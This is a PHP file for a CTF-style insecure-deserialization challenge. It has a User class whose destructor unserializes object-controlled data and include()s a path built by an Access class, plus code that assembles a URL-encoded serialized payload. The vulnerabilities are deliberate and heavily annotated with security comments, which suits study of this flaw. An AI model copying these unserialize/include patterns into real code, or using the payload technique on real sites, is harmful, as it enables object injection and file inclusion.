<?php
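/**
 * CTF-style deserialization sink.
 *
 * When a User is destroyed and its username loosely equals "admin", exec()
 * unserializes $value and, if the result is an Access instance, include()s
 * the path returned by Access::getToken().
 *
 * SECURITY: unsafe by construction. Both the data handed to unserialize() and
 * the path handed to include() are derived from object state that a
 * deserialized payload fully controls. Do not reuse this pattern; exchange
 * data as JSON, or pass ['allowed_classes' => false] to unserialize(), and
 * never include() a path built from object properties.
 */
class User
{
    /** @var mixed Defaults to integer 0; compared loosely against "admin" in __destruct(). */
    public $username = 0;

    /** @var mixed Handed directly to unserialize() by exec(). */
    public $value;

    /**
     * Round-trips $value through unserialize/serialize/unserialize and
     * includes the file named by the resulting Access object, if any.
     *
     * @return void
     */
    public function exec()
    {
        // SECURITY: unserialize() without an allowed_classes restriction will
        // instantiate any class that is loaded and run its magic methods.
        $ser = unserialize(serialize(unserialize($this->value)));
        if ($ser != $this->value && $ser instanceof Access) {
            // SECURITY: the include target is computed from the deserialized
            // object's own properties; it is never resolved or checked against
            // a fixed allowlist before being executed as PHP.
            include($ser->getToken());
        }
    }

    /**
     * Runs exec() on destruction when the username check passes.
     *
     * @return void
     */
    public function __destruct()
    {
        // The string delimiters here were typographic quotes in the source,
        // which PHP does not treat as string delimiters; straight quotes restored.
        // NOTE(review): `==` is a loose comparison. On PHP versions before 8.0
        // the integer default 0 compares equal to "admin". If this is meant as
        // an authorization gate, use `===` against a string-typed property.
        if ($this->username == "admin") {
            $this->exec();
        }
    }
}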

/**
 * Produces the path that User::exec() passes to include().
 *
 * SECURITY: the only validation is a type check and a single-substring
 * denylist. Neither constrains where the resulting path points, and the
 * default suffix already contains a "../" segment. A value that reaches
 * include() should be resolved with realpath() and compared against a fixed
 * allowlist of files rather than filtered by substring.
 */
class Access
{
    protected $prefix = "/";
    protected $suffix = "/../flag";

    /**
     * Concatenates prefix, the literal 'lilctf' and suffix.
     *
     * @return string
     * @throws Exception when prefix or suffix is not a string, or when the
     *                   assembled path contains the substring 'pearcmd'
     */
    public function getToken()
    {
        // Both parts must be strings before they are joined.
        foreach ([$this->prefix, $this->suffix] as $part) {
            if (!is_string($part)) {
                throw new Exception("Go to HELL!");
            }
        }

        $path = "{$this->prefix}lilctf{$this->suffix}";

        // Exact, case-sensitive substring test; nothing else is rejected.
        if (strpos($path, 'pearcmd') === false) {
            return $path;
        }

        throw new Exception("Can I have peachcmd?");
    }
}

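// Serialize a User whose $value holds a serialized Access, wrapped in a
// two-element array next to null, then URL-encode and print the result.
$a = new User();
$a->value = serialize(new Access());
$b = array(0 => $a, 1 => null);
$ser = urlencode(serialize($b));
echo $ser;

// Substring denylist, presumably mirroring a server-side input filter.
// The string delimiters on the lines below were typographic quotes in the
// source and have been restored to straight quotes.
// NOTE(review): this check runs on the URL-encoded string, where `"` and `:`
// are percent-encoded, so the 'Access":' needle cannot match as written and
// the && condition cannot pass; to mirror a filter on the decoded request
// value it would have to test urldecode($ser).
// SECURITY: filtering substrings of serialized data is not a dependable
// control; the robust mitigation is not to unserialize untrusted input, or to
// pass ['allowed_classes' => false].
if (strpos($ser, 'admin') !== false && strpos($ser, 'Access":') !== false) {
    exit("no way!!!!");
}

// SECURITY: unserialize() on request-derived data instantiates User and
// Access from the payload. The throw that follows is not a reliable guard,
// because PHP may run __destruct() on unserialized objects before that line
// is reached.
$user = unserialize(urldecode($ser));
throw new Exception("nonono!!!");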